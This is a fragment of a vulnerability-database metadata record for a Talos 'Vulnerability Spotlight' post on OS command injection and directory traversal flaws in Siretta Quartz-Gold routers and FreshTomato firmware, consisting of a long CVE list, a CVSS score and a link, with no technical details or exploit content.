"authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-3948", "CVE-2018-3949", "CVE-2018-3950", "CVE-2018-3951", "CVE-2018-3953", "CVE-2018-3955", "CVE-2018-4061", "CVE-2018-4062", "CVE-2018-4063", "CVE-2018-4064", "CVE-2018-4065", "CVE-2018-4066", "CVE-2018-4067", "CVE-2018-4068", "CVE-2018-4069", "CVE-2018-4070", "CVE-2018-4071", "CVE-2018-4072", "CVE-2018-4073", "CVE-2019-11823", "CVE-2019-5016", "CVE-2019-5017", "CVE-2019-5101", "CVE-2019-5102", "CVE-2020-11117", "CVE-2020-27648", "CVE-2020-27649", "CVE-2020-27650", "CVE-2020-27651", "CVE-2020-27652", "CVE-2020-27653", "CVE-2020-27654", "CVE-2020-27655", "CVE-2020-27656", "CVE-2020-27657", "CVE-2020-27658", "CVE-2020-27659", "CVE-2020-27660", "CVE-2021-21743", "CVE-2021-21744", "CVE-2021-21745", "CVE-2021-21746", "CVE-2021-21747", "CVE-2021-21748", "CVE-2021-21749", "CVE-2021-21816", "CVE-2021-21817", "CVE-2021-21818", "CVE-2021-21819", "CVE-2021-21820", "CVE-2021-21913", "CVE-2022-21178", "CVE-2022-21182", "CVE-2022-21201", "CVE-2022-21238", "CVE-2022-21809", "CVE-2022-22140", "CVE-2022-22144", "CVE-2022-23103", "CVE-2022-23399", "CVE-2022-23918", "CVE-2022-23919", "CVE-2022-24005", "CVE-2022-24029", "CVE-2022-24910", "CVE-2022-25172", "CVE-2022-25932", "CVE-2022-25995", "CVE-2022-25996", "CVE-2022-26002", "CVE-2022-26007", "CVE-2022-26009", "CVE-2022-26020", "CVE-2022-26023", "CVE-2022-26042", "CVE-2022-26075", "CVE-2022-26085", "CVE-2022-26342", "CVE-2022-26346", "CVE-2022-26376", "CVE-2022-26420", "CVE-2022-26510", "CVE-2022-26518", "CVE-2022-26780", "CVE-2022-26782", "CVE-2022-27172", "CVE-2022-27178", "CVE-2022-27185", "CVE-2022-27630", "CVE-2022-27631", "CVE-2022-27633", "CVE-2022-27660", "CVE-2022-28127", "CVE-2022-28664", "CVE-2022-28665", "CVE-2022-28689", "CVE-2022-29481", "CVE-2022-29888", "CVE-2022-30543", "CVE-2022-32585", "CVE-2022-32765", "CVE-2022-33150", "CVE-2022-33312", "CVE-2022-33314", "CVE-2022-33325", "CVE-2022-33329", "CVE-2022-33897", "CVE-2022-34845", "CVE-2022-34850", "CVE-2022-35261", "CVE-2022-35271", "CVE-2022-35401", "CVE-2022-36279", "CVE-2022-36429", "CVE-2022-37337", "CVE-2022-38066", "CVE-2022-38088", "CVE-2022-38105", "CVE-2022-38393", "CVE-2022-38451", "CVE-2022-38452", "CVE-2022-38458", "CVE-2022-38459", "CVE-2022-38715", "CVE-2022-39045", "CVE-2022-40220", "CVE-2022-40222", "CVE-2022-40701", "CVE-2022-40969", "CVE-2022-40985", "CVE-2022-41030", "CVE-2022-41154", "CVE-2022-41991", "CVE-2022-42484", "CVE-2022-42490", "CVE-2022-42493", "CVE-2023-22299", "CVE-2023-22306", "CVE-2023-22319", "CVE-2023-22365", "CVE-2023-22371", "CVE-2023-22653", "CVE-2023-22659", "CVE-2023-22844", "CVE-2023-23546", "CVE-2023-23547", "CVE-2023-23550", "CVE-2023-23571", "CVE-2023-23902", "CVE-2023-23907", "CVE-2023-24018", "CVE-2023-24019", "CVE-2023-24496", "CVE-2023-24497", "CVE-2023-24519", "CVE-2023-24520", "CVE-2023-24582", "CVE-2023-24583", "CVE-2023-24595", "CVE-2023-25081", "CVE-2023-25124", "CVE-2023-25582", "CVE-2023-25583"], "modified": "2023-08-02T12:00:19", "id": "TALOSBLOG:F12D609E385BA1FCE69CBF1839C98B04", "href": "https://blog.talosintelligence.com/router-researcher-vulnerability-spotlight-23/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}

Vulnerability Spotlight: OS command injection, directory traversal and other vulnerabilities found in Siretta Quartz-Gold and FreshTomato

Description

Related